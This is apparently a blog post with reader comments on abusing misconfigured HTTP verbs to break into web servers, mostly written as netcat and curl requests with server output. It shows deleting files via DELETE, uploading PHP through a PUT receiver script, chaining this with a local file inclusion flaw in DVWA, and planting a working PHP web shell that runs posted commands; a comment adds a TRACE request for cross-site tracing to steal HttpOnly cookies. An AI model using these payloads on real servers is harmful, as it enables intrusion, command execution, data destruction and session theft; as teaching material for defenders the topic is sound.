The HTTP protocol comprises of the following verbs or methods.
- GET
- HEAD
- POST
- PUT
- DELETE
- CONNECT
- OPTIONS
- TRACE
I assume you are well aware of these, you can read more about them in detail from this RFC document.
I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be very rare but thought of sharing 🙂
OPTIONS
The OPTIONS verb is enabled in the server it can be used to view all the HTTP methods configured.
% nc localhost 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Allow: OPTIONS, TRACE, GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Sun, 14 Jun 2015 05:31:10 GMT Connection: close
DELETE
The DELETE verb is a dangerous verb and can be misused. If this is misconfigured, can be use to delete resources from the web server.
% nc localhost 80 DELETE /location/resource HTTP/1.0 Date: Sun, 14 Jun 2015 05:01:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8
PUT
This verb can be used to upload a resource into the server. This is also a risky verb if not configured applicably. For example suppose we want to write “<?php echo ‘Hello World’; ?>” in a new file as “hello.php”. Make sure you give the correct length of your payload.
% cat -e hello.php <?php echo 'Hello World'; ?>$ % wc -m hello.php 29 hello.php % nc localhost 80 PUT /hello.php HTTP/1.0 Content-Type: text/html Content-Length: 29 <?php echo 'Hello World'; ?>
PUT verb in PHP
PHP has the support for the PUT verb. This is a sample program which will receive the data from the PUT request and save it as “myfile”.
[code language=”php”]
<?php
$putdata = fopen("php://input", "r");
$fp = fopen("myfile", "w");
while ($data = fread($putdata, 1024)) fwrite($fp, $data);
fclose($fp);
fclose($putdata);
?>
[/code]
I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.
% cat -e phpinfo.php <?php phpinfo(); ?>$ % wc -m phpinfo.php 20 phpinfo.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 20 <?php phpinfo(); ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 06:48:16 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
Now if you view “myfile” our payload should be nice written.
Suppose you have a local file inclusion situation, in cases like that we can include our newly written file using PUT ?
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
[code language=”php”]
<?php
echo "File included: ".$_REQUEST["page"]."<br>";
$file = $_REQUEST["page"];
include $file;
?>
[/code]
http://localhost/dvwa/vulnerabilities/fi/?page=../../../myfile
Suppose we want to upload a simple web shell we can do it like the following 😉
% wc -m shell.php 189 shell.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 189 <?php print '<form method="post"> Command: <input type="text" name="__"><br> <input type="submit"> </form>'; if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>'; ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 07:39:42 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
After that include our “myfile” and you can execute commands on the server.
You can also use curl to upload a file using PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v * About to connect() to 192.168.1.5 port 80 (#0) * Trying 192.168.1.5... * connected * Connected to 192.168.1.5 (192.168.1.5) port 80 (#0) > PUT /put.php HTTP/1.1 > User-Agent: curl/7.26.0 > Host: 192.168.1.5 > Accept: */* > Content-Length: 189 > Expect: 100-continue > * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 100 Continue * additional stuff not fine transfer.c:1037: 0 0 * We are completely uploaded and fine * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Date: Mon, 15 Jun 2015 07:47:44 GMT < Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 < X-Powered-By: PHP/5.4.22 < Content-Length: 0 < Content-Type: text/html < * Connection #0 to host 192.168.1.5 left intact * Closing connection #0
Thanks for reading !
References
[1] http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
[2] https://tools.ietf.org/html/rfc7231
wow, awesome bro . It is a new thing to learn it 😀 Thanks for writing 🙂
wow :O really nice (y) Thankx 4 sharing
Thanks for the feedback !
Nice share, you explained how to exploit PUT & DELETE, so, what about the TRACE method?
In TRACE method you can inject your own header for example:
root@kali:~/temp# curl -v -X TRACE -H "X-Header: Osanda" Host.com
* About to connect() to Host.com port 80 (#0)
* Trying 1.1.1.1...
* connected
* Connected to Host.com (1.1.1.1) port 80 (#0)
> TRACE / HTTP/1.1
> User-Agent: curl/7.26.0
> Host: Host.com
> Accept: */*
> X-Header: Osanda
>
* additional stuff not fine transfer.c:1037: 0 0
* HTTP 1.1 or later with persistent connection, pipelining supported
< HTTP/1.1 200 OK
< Date: Wed, 17 Jun 2015 07:58:18 GMT
< Server: Apache/2.2.3 (CentOS)
< Connection: close
< Transfer-Encoding: chunked
< Content-Type: message/http
<
TRACE / HTTP/1.1
User-Agent: curl/7.26.0
Host: Host.com
Accept: */*
X-Header: Osanda
This can lead to stealing of cookies even if the HttpOnly flags are set.
More information on XST attacks:
https://www.owasp.org/index.php/Cross_Site_Tracing